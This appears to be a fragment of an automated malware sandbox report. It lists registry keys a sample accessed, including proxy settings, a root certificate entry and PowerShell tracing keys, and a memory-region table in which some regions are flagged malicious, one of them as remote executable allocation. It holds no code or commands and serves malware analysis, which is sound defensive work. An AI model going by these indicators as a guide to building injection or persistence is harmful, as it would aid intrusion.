HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP5FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP6FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP5FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP6FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\3003F
3003F
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\3003F
3003F
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 420 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
38C8000
trusted library allocation
page read and write
malicious
755000
heap
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
4D83000
heap
page read and write
4F63000
heap
page read and write
2040000
heap
page read and write
49FE000
stack
page read and write
5294000
heap
page read and write
4B7B000
stack
page read and write
3740000
heap
page read and write
66C000
heap
page read and write
7EF71000
trusted library allocation
page execute read
147000
heap
page read and write
10016000
direct allocation
page execute and read and write
36F1000
heap
page read and write
4D7E000
stack
page read and write
273B000
trusted library allocation
page read and write
4DC9000
heap
page read and write
3EE000
stack
page read and write
3B80000
trusted library allocation
page read and write
4D8E000
heap
page read and write
2A08000
heap
page read and write
400000
system
page execute and read and write
98F000
heap
page read and write
454F000
stack
page read and write
2D5D000
stack
page read and write
2727000
trusted library allocation
page read and write
3E8E000
stack
page read and write
271A000
trusted library allocation
page read and write
2A0D000
heap
page read and write
450000
trusted library allocation
page execute and read and write
2020000
heap
page read and write
89000
stack
page read and write
270000
heap
page read and write
AF0000
trusted library allocation
page read and write
459000
heap
page read and write
25D000
stack
page read and write
2926000
heap
page read and write
577000
heap
page read and write
478000
heap
page read and write
4E0F000
stack
page read and write
4CAE000
heap
page read and write
481000
heap
page read and write
38AC000
stack
page read and write
6F8000
trusted library allocation
page read and write
96B000
heap
page read and write
8D4000
heap
page read and write
FCE000
stack
page read and write
3ACF000
stack
page read and write
960000
heap
page read and write
1A4000
trusted library allocation
page read and write
29A1000
heap
page read and write
4B4B000
stack
page read and write
49B000
heap
page read and write
2A3B000
heap
page read and write
A90000
trusted library allocation
page read and write
621C000
stack
page read and write
4F4000
heap
page read and write
600000
heap
page read and write
2736000
trusted library allocation
page read and write
9D0000
trusted library allocation
page read and write
3020000
trusted library allocation
page read and write
573000
heap
page read and write
1D79000
heap
page read and write
18A000
stack
page read and write
39FA000
heap
page read and write
3B82000
trusted library allocation
page read and write
2D8000
heap
page read and write
EFE000
stack
page read and write
36E3000
heap
page read and write
399000
trusted library allocation
page read and write
2007000
heap
page read and write
3F8F000
heap
page read and write
39C6000
heap
page read and write
10000
heap
page read and write
86F000
stack
page read and write
66B000
heap
page read and write
5EDE000
stack
page read and write
398C000
heap
page read and write
2A1E000
heap
page read and write
3501000
trusted library allocation
page read and write
34E000
stack
page read and write
39FA000
heap
page read and write
750000
trusted library allocation
page execute and read and write
F0000
heap
page read and write
1E0000
trusted library allocation
page read and write
912000
heap
page read and write
3A07000
heap
page read and write
20000
heap
page read and write
471000
heap
page read and write
39B8000
heap
page read and write
37DF000
stack
page read and write
91E000
heap
page read and write
E2A000
heap
page read and write
9A8000
heap
page read and write
67E000
stack
page read and write
52EE000
stack
page read and write
5F50000
heap
page read and write
20000
heap
page read and write
99D000
heap
page read and write
4A3C000
stack
page read and write
3A0000
trusted library allocation
page read and write
93A1000
trusted library allocation
page read and write
5010000
heap
page read and write
E4A000
heap
page read and write
3745000
heap
page read and write
6310000
heap
page read and write
474000
remote allocation
page execute and read and write
39C1000
heap
page read and write
993000
heap
page read and write
5A0000
heap
page read and write
F06000
heap
page execute and read and write
2725000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
2921000
heap
page read and write
391D000
stack
page read and write
27FA000
trusted library allocation
page read and write
38B0000
heap
page read and write
36EE000
heap
page read and write
2736000
trusted library allocation
page read and write
398C000
heap
page read and write
382000
stack
page read and write
270000
trusted library allocation
page read and write
5110000
heap
page read and write
2748000
trusted library allocation
page read and write
3830000
heap
page read and write
3A15000
heap
page read and write
2A1B000
heap
page read and write
990000
heap
page execute and read and write
A10000
trusted library allocation
page read and write
4D24000
heap
page read and write
104E000
stack
page read and write
39ED000
heap
page read and write
3529000
trusted library allocation
page read and write
397A000
heap
page read and write
29A1000
heap
page read and write
39FF000
heap
page read and write
4A0000
heap
page read and write
5E94000
heap
page read and write
4D7000
heap
page read and write
3330000
trusted library allocation
page read and write
2600000
trusted library allocation
page read and write
257000
stack
page read and write
99E000
heap
page read and write
3E7000
heap
page read and write
4BFD000
heap
page read and write
490000
heap
page read and write
446000
heap
page read and write
1A3000
trusted library allocation
page execute and read and write
9A4000
heap
page read and write
900000
trusted library allocation
page execute and read and write
203F000
direct allocation
page read and write
2740000
trusted library allocation
page read and write
43B0000
heap
page read and write
4D6B000
heap
page read and write
EB0000
trusted library allocation
page execute and read and write
7AC000
heap
page read and write
39C7000
heap
page read and write
350D000
trusted library allocation
page read and write
F72000
trusted library allocation
page read and write
90000
heap
page read and write
275C000
trusted library allocation
page read and write
3524000
heap
page read and write
F81000
trusted library allocation
page read and write
264000
trusted library allocation
page read and write
24BE000
stack
page read and write
648E000
stack
page read and write | page guard
39CC000
heap
page read and write
930000
trusted library allocation
page read and write
666000
heap
page read and write
43B0000
trusted library allocation
page read and write
39CC000
heap
page read and write
2A5F000
stack
page read and write
21A0000
heap
page read and write
43B0000
trusted library allocation
page read and write
473000
system
page execute and read and write
36F2000
heap
page read and write
664000
heap
page read and write
F90000
heap
page execute and read and write
39FC000
heap
page read and write
4038000
heap
page read and write
39CA000
heap
page read and write
42D0000
heap
page read and write
DE0000
trusted library allocation
page read and write
4D1000
heap
page read and write
2005000
heap
page read and write
39C4000
heap
page read and write
398E000
heap
page read and write
2700000
trusted library allocation
page read and write
DDE000
stack
page read and write | page guard
416D000
stack
page read and write
5D0000
direct allocation
page read and write
E22000
heap
page read and write
29BC000
heap
page read and write
29BC000
heap
page read and write
635E000
stack
page read and write
29BC000
heap
page read and write
36DF000
heap
page read and write
911000
heap
page read and write
1FAD000
heap
page read and write
39CF000
heap
page read and write
64B000
heap
page read and write
797000
heap
page read and write
8BE000
stack
page read and write
980000
heap
page read and write
3B80000
trusted library allocation
page read and write
990000
heap
page read and write
3A14000
heap
page read and write
3537000
trusted library allocation
page read and write
36F1000
heap
page read and write
900000
trusted library allocation
page read and write
2942000
heap
page read and write
5F90000
heap
page read and write
4CA2000
heap
page read and write
2214000
heap
page read and write
588000
heap
page read and write
263A000
trusted library allocation
page read and write
2012000
heap
page read and write
299F000
heap
page read and write
490000
trusted library allocation
page read and write
39CA000
heap
page read and write
36EA000
heap
page read and write
2F68000
heap
page read and write
2020000
heap
page read and write
49E000
heap
page read and write
51D000
heap
page read and write
512000
heap
page read and write
30000
heap
page read and write
30E000
stack
page read and write
660000
heap
page read and write
36DE000
heap
page read and write
271E000
trusted library allocation
page read and write
1F83000
heap
page read and write
2745000
trusted library allocation
page read and write
980000
trusted library allocation
page read and write
203F000
direct allocation
page read and write
34FA000
trusted library allocation
page read and write
39ED000
heap
page read and write
B7000
stack
page read and write
27F000
heap
page read and write
260000
trusted library allocation
page read and write
39F3000
heap
page read and write
5008000
heap
page read and write
63F000
heap
page read and write
49BE000
stack
page read and write
F20000
trusted library allocation
page read and write
1DAA000
heap
page read and write
2F6C000
heap
page read and write
2D2E000
stack
page read and write
526E000
stack
page read and write
2739000
trusted library allocation
page read and write
4D7000
heap
page read and write
910000
trusted library allocation
page read and write
274E000
trusted library allocation
page read and write
660000
heap
page read and write
36EB000
heap
page read and write
E33000
heap
page read and write
4A8E000
stack
page read and write
3B5000
trusted library allocation
page read and write
E00000
trusted library allocation
page read and write
66C000
heap
page read and write
5AE000
heap
page read and write
F40000
trusted library allocation
page read and write
4DDF000
stack
page read and write
4A9D000
stack
page read and write
39ED000
heap
page read and write
3A14000
heap
page read and write
36ED000
heap
page read and write
E80000
trusted library allocation
page read and write
210000
trusted library allocation
page read and write
34FD000
heap
page read and write
201D000
heap
page read and write
39C1000
heap
page read and write
5DFE000
stack
page read and write
51B000
heap
page read and write
1D0000
trusted library allocation
page read and write
4D3C000
heap
page read and write
3B70000
heap
page read and write
46E000
heap
page read and write
1EFE000
stack
page read and write
18B000
heap
page read and write
50B0000
heap
page read and write
2754000
trusted library allocation
page read and write
4FDE000
heap
page read and write
C3A1000
trusted library allocation
page read and write
4D9A000
heap
page read and write
39ED000
heap
page read and write
39D6000
heap
page read and write
660000
heap
page read and write
29C3000
heap
page read and write
E53000
heap
page read and write
2718000
trusted library allocation
page read and write
2AE000
stack
page read and write | page guard
48F000
heap
page read and write
4BE6000
heap
page read and write
39FA000
heap
page read and write
2717000
trusted library allocation
page read and write
25D000
stack
page read and write
537000
heap
page read and write
36D4000
heap
page read and write
3B80000
trusted library allocation
page read and write
4DBE000
heap
page read and write
5AC000
heap
page read and write
3906000
heap
page read and write
2961000
heap
page read and write
2020000
heap
page read and write
2282000
heap
page read and write
640000
heap
page read and write
4FF000
heap
page read and write
61CC000
stack
page read and write
50F8000
heap
page read and write
332000
heap
page read and write
664000
heap
page read and write
4C50000
heap
page read and write
4A9000
heap
page read and write
19C000
stack
page read and write
2B8E000
stack
page read and write
39CA000
heap
page read and write
2022000
heap
page read and write
4ECE000
stack
page read and write
6F0000
heap
page read and write
4CE000
heap
page read and write
2020000
heap
page read and write
3510000
trusted library allocation
page read and write
5100000
heap
page read and write
2F6B000
heap
page read and write
660000
heap
page read and write
3A02000
heap
page read and write
39B8000
heap
page read and write
E59000
heap
page read and write
9AD000
heap
page read and write
322000
heap
page read and write
3E0000
heap
page read and write
521000
heap
page read and write
37000
heap
page read and write
29A0000
heap
page read and write
53E000
heap
page read and write
521E000
stack
page read and write
5D2F000
stack
page read and write
2031000
heap
page read and write
39F7000
heap
page read and write
984000
heap
page read and write
2913000
trusted library allocation
page read and write
4CE9000
heap
page read and write
E1F000
heap
page read and write
381C000
stack
page read and write
49E000
heap
page read and write
34D0000
trusted library allocation
page read and write
A3A1000
trusted library allocation
page read and write
5B1000
heap
page read and write
4D2E000
stack
page read and write
4C67000
heap
page read and write
1FAA000
heap
page read and write
2725000
trusted library allocation
page read and write
9CB000
stack
page read and write
2A60000
heap
page read and write
140000
heap
page read and write
45D000
heap
page read and write
14B000
stack
page read and write
43B0000
trusted library allocation
page read and write
2F60000
trusted library allocation
page read and write
10000
heap
page read and write
39CA000
heap
page read and write
4DA6000
heap
page read and write
43B0000
trusted library allocation
page read and write
465000
heap
page read and write
660000
heap
page read and write
48AE000
stack
page read and write
3B82000
trusted library allocation
page read and write
48BE000
stack
page read and write
34C9000
trusted library allocation
page read and write
34B0000
heap
page read and write
630000
heap
page read and write
4C15000
heap
page read and write
43B0000
trusted library allocation
page read and write
63A000
heap
page read and write
96B000
heap
page read and write
7EF78000
trusted library allocation
page execute read
E4A000
heap
page read and write
5A2000
direct allocation
page read and write
2941000
heap
page read and write
4AD000
heap
page read and write
39D7000
heap
page read and write
36ED000
heap
page read and write
274D000
trusted library allocation
page read and write
555000
heap
page read and write
2232000
heap
page read and write
4E50000
heap
page read and write
AE0000
trusted library allocation
page read and write
2543000
trusted library allocation
page read and write
36E0000
heap
page read and write
5D1D000
stack
page read and write
39FC000
heap
page read and write
5B0000
direct allocation
page read and write
10000
heap
page read and write
606000
heap
page read and write
2738000
trusted library allocation
page read and write
34CA000
trusted library allocation
page read and write
480000
trusted library allocation
page read and write
4C73000
heap
page read and write
A40000
heap
page execute and read and write
42C8000
trusted library allocation
page read and write
2AF000
stack
page read and write
2721000
trusted library allocation
page read and write
F00000
heap
page execute and read and write
486000
heap
page read and write
315000
heap
page read and write
29A5000
heap
page read and write
39D3000
heap
page read and write
398E000
heap
page read and write
820000
heap
page read and write
9E0000
trusted library allocation
page read and write
B00000
trusted library allocation
page read and write
3A02000
heap
page read and write
39C1000
heap
page read and write
271C000
trusted library allocation
page read and write
2713000
trusted library allocation
page read and write
286F000
stack
page read and write
5E9E000
stack
page read and write
253F000
stack
page read and write
3983000
heap
page read and write
E70000
trusted library allocation
page read and write
4B8E000
stack
page read and write
4FA0000
heap
page read and write
38FF000
heap
page read and write
2CBF000
stack
page read and write
460000
heap
page read and write
27A000
trusted library allocation
page read and write
4FE0000
heap
page read and write
2A1B000
heap
page read and write
43C000
heap
page read and write
45C000
system
page execute and read and write
4CC6000
heap
page read and write
9F0000
trusted library allocation
page read and write
2A1B000
heap
page read and write
459000
system
page execute and read and write
39D7000
heap
page read and write
598000
heap
page read and write
33EE000
stack
page read and write
E47000
heap
page read and write
241E000
stack
page read and write
4B70000
heap
page read and write
640E000
stack
page read and write
484E000
stack
page read and write
5290000
heap
page read and write
90F000
heap
page read and write
29A1000
heap
page read and write
27BD000
trusted library allocation
page read and write
29AB000
heap
page read and write
2706000
trusted library allocation
page read and write
36C8000
heap
page read and write
39CC000
heap
page read and write
39B1000
heap
page read and write
2A1B000
heap
page read and write
660000
heap
page read and write
400000
system
page execute and read and write
2030000
heap
page read and write
36E5000
heap
page read and write
2030000
heap
page read and write
3150000
heap
page read and write
D90000
trusted library allocation
page read and write
43B0000
trusted library allocation
page read and write
36F1000
heap
page read and write
3E0E000
stack
page read and write
39B8000
heap
page read and write
9DA1000
trusted library allocation
page read and write
403B000
heap
page read and write
3CD000
stack
page read and write
29A3000
heap
page read and write
41F000
system
page execute and read and write
1D50000
heap
page read and write
2A0D000
heap
page read and write
19C000
stack
page read and write
F12000
trusted library allocation
page read and write
7C9000
heap
page read and write
398000
stack
page read and write
36E5000
heap
page read and write
2005000
heap
page read and write
427000
heap
page read and write
E40000
trusted library allocation
page execute and read and write
487000
heap
page read and write
2020000
heap
page read and write
4C0E000
stack
page read and write
1D5000
trusted library allocation
page execute and read and write
10000
heap
page read and write
2AAC000
stack
page read and write
4B3000
heap
page read and write
3B0000
trusted library allocation
page read and write
5038000
heap
page read and write
350000
heap
page execute and read and write
6010000
heap
page read and write
36DE000
heap
page read and write
39CF000
heap
page read and write
F10000
heap
page read and write
395B000
heap
page read and write
290F000
stack
page read and write
39D3000
heap
page read and write
3747000
heap
page read and write
5E00000
heap
page read and write
3D80000
trusted library allocation
page read and write
201D000
heap
page read and write
4030000
heap
page read and write
2A05000
heap
page read and write
2C7F000
stack
page read and write
1D2000
trusted library allocation
page read and write
7A0000
trusted library allocation
page read and write
26D000
trusted library allocation
page execute and read and write
5049000
heap
page read and write
39CA000
heap
page read and write
4500000
trusted library allocation
page execute and read and write
8AA000
stack
page read and write
E1F000
heap
page read and write
385000
heap
page read and write
867000
trusted library allocation
page read and write
98A000
heap
page read and write
2A30000
heap
page read and write
F0F000
stack
page read and write
4BBD000
stack
page read and write
39C1000
heap
page read and write
669000
heap
page read and write
4E4C000
stack
page read and write
39FA000
heap
page read and write
34ED000
trusted library allocation
page read and write
39D3000
heap
page read and write
512000
heap
page read and write
274B000
trusted library allocation
page read and write
2020000
heap
page read and write
577000
heap
page read and write
29A5000
heap
page read and write
7DA1000
trusted library allocation
page read and write
17E000
heap
page read and write
29A7000
heap
page read and write
550000
direct allocation
page read and write
592000
direct allocation
page read and write
3B90000
trusted library allocation
page read and write
570000
heap
page read and write
3510000
trusted library allocation
page read and write
180000
heap
page read and write
E5D000
stack
page read and write
43C000
heap
page read and write
34CF000
stack
page read and write
39CF000
heap
page read and write
10000
heap
page read and write
3A02000
heap
page read and write
4C7F000
heap
page read and write
E02000
heap
page read and write
271A000
trusted library allocation
page read and write
36DE000
heap
page read and write
468000
heap
page read and write
2A1E000
heap
page read and write
2DC000
heap
page read and write
36DB000
heap
page read and write
310000
heap
page read and write
8AE000
stack
page read and write
471000
heap
page read and write
DFF000
heap
page read and write
9A7000
heap
page read and write
980000
heap
page read and write
4FC3000
heap
page read and write
660000
heap
page read and write
E20000
trusted library allocation
page read and write
36ED000
heap
page read and write
5046000
heap
page read and write
49EE000
stack
page read and write
360000
heap
page read and write
274A000
trusted library allocation
page read and write
29AB000
heap
page read and write
8EF000
stack
page read and write
39D3000
heap
page read and write
2BAD000
stack
page read and write
3519000
trusted library allocation
page read and write
4B0E000
stack
page read and write
508000
heap
page read and write
7EF75000
trusted library allocation
page execute read
73A1000
trusted library allocation
page read and write
4DBF000
stack
page read and write
29BC000
heap
page read and write
2DDD000
stack
page read and write
2A1E000
heap
page read and write
310000
heap
page read and write
664000
heap
page read and write
26C000
stack
page read and write
78A000
heap
page read and write
8B0000
heap
page read and write
2970000
heap
page read and write
4D30000
heap
page read and write
2734000
trusted library allocation
page read and write
3A0A000
heap
page read and write
2501000
trusted library allocation
page read and write
10000
heap
page read and write
2A1E000
heap
page read and write
EC000
stack
page read and write
996000
heap
page read and write
98E000
heap
page read and write
36EA000
heap
page read and write
4B87000
heap
page read and write
2A0D000
heap
page read and write
4310000
trusted library allocation
page read and write
5D2000
heap
page read and write
565000
heap
page read and write
405000
heap
page read and write
3501000
trusted library allocation
page read and write
2022000
heap
page read and write
21E0000
trusted library allocation
page read and write
471000
heap
page read and write
4BB6000
heap
page read and write
456000
system
page execute and read and write
750000
heap
page read and write
660000
heap
page read and write
4C44000
heap
page read and write
3747000
heap
page read and write
284A000
trusted library allocation
page read and write
63F000
heap
page read and write
429000
heap
page read and write
7B5000
heap
page read and write
81A000
heap
page read and write
39ED000
heap
page read and write
1DB0000
direct allocation
page read and write
97C000
stack
page read and write
2C0000
heap
page read and write
5CDE000
stack
page read and write
E03000
heap
page read and write
2AAE000
stack
page read and write
3529000
trusted library allocation
page read and write
39CC000
heap
page read and write
D80000
trusted library allocation
page read and write
39CC000
heap
page read and write
3D3000
trusted library allocation
page read and write
1D0000
trusted library allocation
page read and write
34BF000
trusted library allocation
page read and write
4C2E000
stack
page read and write
39B3000
heap
page read and write
34F8000
trusted library allocation
page read and write
39CF000
heap
page read and write
A30000
trusted library allocation
page read and write
E36000
heap
page read and write
29BC000
heap
page read and write
249F000
stack
page read and write
DDF000
stack
page read and write
39F7000
heap
page read and write
953000
heap
page read and write
64C000
heap
page read and write
5E04000
heap
page read and write
4D8E000
stack
page read and write
39D3000
heap
page read and write
2B0E000
stack
page read and write
4C38000
heap
page read and write
46B000
heap
page read and write
38D0000
heap
page read and write
4DD5000
heap
page read and write
1B0000
trusted library allocation
page read and write
1E0000
heap
page read and write
3D80000
trusted library allocation
page read and write
3B8E000
stack
page read and write
710000
heap
page read and write
42E000
stack
page read and write
39D7000
heap
page read and write
37BD000
stack
page read and write
39CC000
heap
page read and write
475000
heap
page read and write
643000
heap
page read and write
510000
heap
page read and write
669000
heap
page read and write
2749000
trusted library allocation
page read and write
4ABE000
stack
page read and write
4E4E000
stack
page read and write
790000
trusted library allocation
page execute and read and write
2012000
heap
page read and write
2F69000
heap
page read and write
63B000
heap
page read and write
367000
heap
page read and write
36F1000
heap
page read and write
2715000
trusted library allocation
page read and write
DFD000
heap
page read and write
2A10000
heap
page read and write
39B8000
heap
page read and write
2B1F000
stack
page read and write
7EF73000
trusted library allocation
page execute read
639000
heap
page read and write
93D000
stack
page read and write
251D000
trusted library allocation
page read and write
24C000
stack
page read and write
38B1000
heap
page read and write
36DB000
heap
page read and write
3F5B000
heap
page read and write
3AC000
trusted library allocation
page read and write
495000
heap
page read and write
730000
heap
page read and write
E10000
trusted library allocation
page read and write
1A0000
heap
page read and write
39CF000
heap
page read and write
39D3000
heap
page read and write
48F000
heap
page read and write
4CDD000
heap
page read and write
3FCF000
stack
page read and write
4D5000
heap
page read and write
1FB2000
heap
page read and write
E1E000
heap
page read and write
200000
trusted library allocation
page read and write
23EF000
stack
page read and write
664000
heap
page read and write
42A000
heap
page read and write
3A07000
heap
page read and write
51D000
heap
page read and write
2725000
trusted library allocation
page read and write
36DC000
heap
page read and write
E59000
heap
page read and write
4D3000
heap
page read and write
3EE000
stack
page read and write
4EBE000
stack
page read and write
1F87000
heap
page read and write
271A000
trusted library allocation
page read and write
235F000
stack
page read and write
4C1D000
stack
page read and write
3995000
heap
page read and write
36DE000
heap
page read and write
3A07000
heap
page read and write
27B5000
trusted library allocation
page read and write
EA0000
trusted library allocation
page read and write
239F000
stack
page read and write
108A000
stack
page read and write
980000
heap
page read and write
664000
heap
page read and write
4C54000
heap
page read and write
34E0000
heap
page read and write
2010000
direct allocation
page read and write
2A1E000
heap
page read and write
496000
heap
page read and write
29C4000
heap
page read and write
4D5F000
stack
page read and write
4FCD000
stack
page read and write
2A0E000
heap
page read and write
476000
heap
page read and write
273E000
trusted library allocation
page read and write
42E000
heap
page read and write
260000
trusted library allocation
page read and write
E42000
heap
page read and write
36E3000
heap
page read and write
1DFB000
heap
page read and write
351F000
heap
page read and write
10000000
direct allocation
page read and write
5D3E000
stack
page read and write
94D000
stack
page read and write
2A1B000
heap
page read and write
5E1000
heap
page read and write
21A4000
heap
page read and write
36EA000
heap
page read and write
292000
trusted library allocation
page read and write
36DE000
heap
page read and write
4FEF000
heap
page read and write
43B0000
trusted library allocation
page read and write
F70000
trusted library allocation
page read and write
4C6000
heap
page read and write
5A0000
heap
page read and write
398E000
heap
page read and write
39CF000
heap
page read and write
